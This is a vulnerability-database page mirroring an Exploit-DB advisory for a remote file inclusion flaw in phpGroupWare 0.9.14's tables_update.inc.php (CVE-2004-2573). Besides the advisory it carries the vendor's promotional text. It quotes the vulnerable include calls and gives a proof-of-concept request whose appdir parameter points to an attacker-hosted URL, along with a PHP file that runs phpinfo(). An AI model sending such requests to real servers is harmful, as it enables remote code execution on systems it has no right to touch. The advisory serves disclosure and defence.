Lucene search
+L

phpGroupWare 0.9.14 - 'Tables_Update.Inc.php' Remote File Inclusion

🗓️ 27 Jan 2004 00:00:00Reported by Cedric CochinType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 81 Views

phpGroupWare 0.9.14 has a vulnerability allowing remote file inclusion and PHP code execution.

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2004-2573
28 Nov 200523:00
cve
cvelist
Cvelist
CVE-2004-2573
28 Nov 200523:00
cvelist
euvd
EUVD
EUVD-2004-2564
7 Oct 202500:30
euvd
nvd
NVD
CVE-2004-2573
31 Dec 200405:00
nvd
source: https://www.securityfocus.com/bid/12074/info

phpGroupWare is prone to a remote file include vulnerability, potentially allowing the execution of malicious PHP code. This would occur in the context of the affected web server.

The tables_update.inc.php script contains the following include calls:
/* Include older phpGroupWare update support */
include($appdir . 'tables_update_0_9_9.inc.php');
include($appdir . 'tables_update_0_9_10.inc.php');
include($appdir . 'tables_update_0_9_12.inc.php');

For example supplying the following file:
tables_update_0_9_9.inc.php = <?php print "<?php phpinfo();?>" ;?>

The following request will execute the phpinfo() command on the vulnerable target:

http://[victim]/[phpgroupware_directory]/phpgwapi/setup/tables_update.inc.php?appdir=http://[attacker]/

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Apr 2013 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.02643
81